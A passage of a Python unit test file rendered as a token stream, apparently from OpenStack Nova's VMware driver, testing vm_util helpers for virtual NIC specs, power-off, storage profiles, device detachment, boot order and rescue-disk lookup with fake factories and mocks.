name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvsw'"
op|']'
newline|'\n'
nl|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'device'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_create_vif_spec
dedent|''
name|'def'
name|'_get_create_vif_spec'
op|'('
name|'self'
op|','
name|'fake_factory'
op|','
name|'vif_info'
op|')'
op|':'
newline|'\n'
indent|' '
name|'limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
op|')'
newline|'\n'
name|'limits'
op|'.'
name|'limit'
op|'='
number|'10'
newline|'\n'
name|'limits'
op|'.'
name|'reservation'
op|'='
number|'20'
newline|'\n'
name|'limits'
op|'.'
name|'shares_level'
op|'='
string|"'custom'"
newline|'\n'
name|'limits'
op|'.'
name|'shares_share'
op|'='
number|'40'
newline|'\n'
name|'return'
name|'vm_util'
op|'.'
name|'_create_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|','
name|'limits'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_construct_vif_spec
dedent|''
name|'def'
name|'_construct_vif_spec'
op|'('
name|'self'
op|','
name|'fake_factory'
op|','
name|'vif_info'
op|')'
op|':'
newline|'\n'
indent|' '
name|'port'
op|'='
string|"'ns0:DistributedVirtualSwitchPortConnection'"
newline|'\n'
name|'backing'
op|'='
string|"'ns0:VirtualEthernetCardDistributedVirtualPortBackingInfo'"
newline|'\n'
nl|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualE1000'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'macAddress'
op|'='
name|'vif_info'
op|'['
string|"'mac_address'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'47'
newline|'\n'
name|'device'
op|'.'
name|'addressType'
op|'='
string|"'manual'"
newline|'\n'
name|'device'
op|'.'
name|'wakeOnLanEnabled'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'device'
op|'.'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'backing'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'port'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'portgroupKey'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvpg'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'switchUuid'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvsw'"
op|']'
newline|'\n'
name|'if'
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'.'
name|'get'
op|'('
string|"'dvs_port_key'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'portKey'
op|'='
op|'('
nl|'\n'
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvs_port_key'"
op|']'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'device'
op|'.'
name|'resourceAllocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
nl|'\n'
string|"'ns0:VirtualEthernetCardResourceAllocation'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'limit'
op|'='
number|'10'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'reservation'
op|'='
number|'20'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'share'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
nl|'\n'
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'share'
op|'.'
name|'level'
op|'='
string|"'custom'"
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'share'
op|'.'
name|'shares'
op|'='
number|'40'
newline|'\n'
nl|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'device'
newline|'\n'
name|'return'
name|'device_change'
newline|'\n'
nl|'\n'
DECL|member|test_get_create_vif_spec
dedent|''
name|'def'
name|'test_get_create_vif_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'br100'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-group'"
op|'}'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'self'
op|'.'
name|'_get_create_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'device_change'
op|'='
name|'self'
op|'.'
name|'_construct_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'device_change'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_create_vif_spec_dvs_port_key
dedent|''
name|'def'
name|'test_get_create_vif_spec_dvs_port_key'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'br100'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-group'"
op|','
nl|'\n'
string|"'dvs_port_key'"
op|':'
string|"'fake-key'"
op|'}'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'self'
op|'.'
name|'_get_create_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'device_change'
op|'='
name|'self'
op|'.'
name|'_construct_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'device_change'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_detach_config_spec
dedent|''
name|'def'
name|'test_get_network_detach_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_network_detach_config_spec'
op|'('
nl|'\n'
name|'fake_factory'
op|','
string|"'fake-device'"
op|','
number|'2'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
string|"'free'"
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.iface-id.2'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
string|"'fake-device'"
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'remove'"
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance
name|'def'
name|'test_power_off_instance'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_off_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'fake_get_ref'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|','
name|'return_value'
op|'='
string|'"fake-vm-ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance_no_vm_ref
name|'def'
name|'test_power_off_instance_no_vm_ref'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_off_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_get_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance_with_exception
name|'def'
name|'test_power_off_instance_with_exception'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'NovaException'
op|'('
string|"'fake'"
op|')'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NovaException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'power_off_instance'
op|','
nl|'\n'
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'fake_get_ref'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance_power_state_exception
name|'def'
name|'test_power_off_instance_power_state_exception'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
nl|'\n'
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'vexc'
op|'.'
name|'InvalidPowerStateException'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_off_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'fake_get_ref'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_updated_hw_version
dedent|''
dedent|''
name|'def'
name|'test_get_vm_create_spec_updated_hw_version'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'hw_version'
op|'='
string|"'vmx-08'"
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|'='
name|'extra_specs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'vmx-08'"
op|','
name|'result'
op|'.'
name|'version'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_vm_create_spec_with_profile_spec
dedent|''
name|'def'
name|'test_vm_create_spec_with_profile_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'datastore'
op|'='
name|'ds_obj'
op|'.'
name|'Datastore'
op|'('
string|"'fake-ds-ref'"
op|','
string|"'fake-ds-name'"
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'create_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'datastore'
op|'.'
name|'name'
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|','
nl|'\n'
name|'profile_spec'
op|'='
string|"'fake_profile_spec'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'fake_profile_spec'"
op|']'
op|','
name|'create_spec'
op|'.'
name|'vmProfile'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'pbm'
op|','
string|"'get_profile_id_by_name'"
op|')'
newline|'\n'
DECL|member|test_get_storage_profile_spec
name|'def'
name|'test_get_storage_profile_spec'
op|'('
name|'self'
op|','
name|'mock_retrieve_profile_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_profile_id'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'fake_profile_id'
op|'.'
name|'uniqueId'
op|'='
string|"'fake_unique_id'"
newline|'\n'
name|'mock_retrieve_profile_id'
op|'.'
name|'return_value'
op|'='
name|'fake_profile_id'
newline|'\n'
name|'profile_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_storage_profile_spec'
op|'('
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
op|','
nl|'\n'
string|"'fake_policy'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ns0:VirtualMachineDefinedProfileSpec'"
op|','
nl|'\n'
name|'profile_spec'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'fake_profile_id'
op|'.'
name|'uniqueId'
op|','
name|'profile_spec'
op|'.'
name|'profileId'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'pbm'
op|','
string|"'get_profile_id_by_name'"
op|')'
newline|'\n'
DECL|member|test_storage_spec_empty_profile
name|'def'
name|'test_storage_spec_empty_profile'
op|'('
name|'self'
op|','
name|'mock_retrieve_profile_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_retrieve_profile_id'
op|'.'
name|'return_value'
op|'='
name|'None'
newline|'\n'
name|'profile_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_storage_profile_spec'
op|'('
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
op|','
nl|'\n'
string|"'fake_policy'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'profile_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_ephemeral_name
dedent|''
name|'def'
name|'test_get_ephemeral_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
name|'vm_util'
op|'.'
name|'get_ephemeral_name'
op|'('
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ephemeral_0.vmdk'"
op|','
name|'filename'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_detach_and_delete_devices_config_spec
dedent|''
name|'def'
name|'test_detach_and_delete_devices_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_devices'
op|'='
op|'['
string|"'device1'"
op|','
string|"'device2'"
op|']'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'_detach_and_delete_devices_config_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'fake_devices'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device1'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device1'
op|'.'
name|'device'
op|'='
string|"'device1'"
newline|'\n'
name|'device1'
op|'.'
name|'operation'
op|'='
string|"'remove'"
newline|'\n'
name|'device1'
op|'.'
name|'fileOperation'
op|'='
string|"'destroy'"
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device1'
op|')'
newline|'\n'
nl|'\n'
name|'device2'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device2'
op|'.'
name|'device'
op|'='
string|"'device2'"
newline|'\n'
name|'device2'
op|'.'
name|'operation'
op|'='
string|"'remove'"
newline|'\n'
name|'device2'
op|'.'
name|'fileOperation'
op|'='
string|"'destroy'"
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'reconfigure_vm'"
op|')'
newline|'\n'
DECL|member|test_detach_devices_from_vm
name|'def'
name|'test_detach_devices_from_vm'
op|'('
name|'self'
op|','
name|'mock_reconfigure'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_devices'
op|'='
op|'['
string|"'device1'"
op|','
string|"'device2'"
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'detach_devices_from_vm'
op|'('
name|'session'
op|','
nl|'\n'
string|"'fake-ref'"
op|','
nl|'\n'
name|'fake_devices'
op|')'
newline|'\n'
name|'mock_reconfigure'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|','
string|"'fake-ref'"
op|','
name|'mock'
op|'.'
name|'ANY'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_boot_spec
dedent|''
name|'def'
name|'test_get_vm_boot_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'disk'
op|'.'
name|'key'
op|'='
number|'7'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_boot_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'disk'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'boot_disk'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
nl|'\n'
string|"'ns0:VirtualMachineBootOptionsBootableDiskDevice'"
op|')'
newline|'\n'
name|'boot_disk'
op|'.'
name|'deviceKey'
op|'='
name|'disk'
op|'.'
name|'key'
newline|'\n'
name|'boot_options'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineBootOptions'"
op|')'
newline|'\n'
name|'boot_options'
op|'.'
name|'bootOrder'
op|'='
op|'['
name|'boot_disk'
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'bootOptions'
op|'='
name|'boot_options'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_devices
dedent|''
name|'def'
name|'_get_devices'
op|'('
name|'self'
op|','
name|'filename'
op|')'
op|':'
newline|'\n'
indent|' '
name|'devices'
op|'='
name|'fake'
op|'.'
name|'_create_array_of_type'
op|'('
string|"'VirtualDevice'"
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'VirtualDevice'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
nl|'\n'
name|'filename'
op|')'
newline|'\n'
name|'return'
name|'devices'
newline|'\n'
nl|'\n'
DECL|member|test_find_rescue_device
dedent|''
name|'def'
name|'test_find_rescue_device'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
string|"'[test_datastore] uuid/uuid-rescue.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_get_devices'
op|'('
name|'filename'
op|')'
newline|'\n'
name|'device'
op|'='
name|'vm_util'
op|'.'
name|'find_rescue_device'
op|'('
name|'devices'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'filename'
op|','
name|'device'
op|'.'
name|'backing'
op|'.'
name|'fileName'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_find_rescue_device_not_found
dedent|''
name|'def'
name|'test_find_rescue_device_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_get_devices'
op|'('
name|'filename'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NotFound'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'find_rescue_device'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_validate_limits
dedent|''
name|'def'
name|'test_validate_limits'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'high'"
op|','
nl|'\n'
name|'shares_share'
op|'='
number|'1948'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
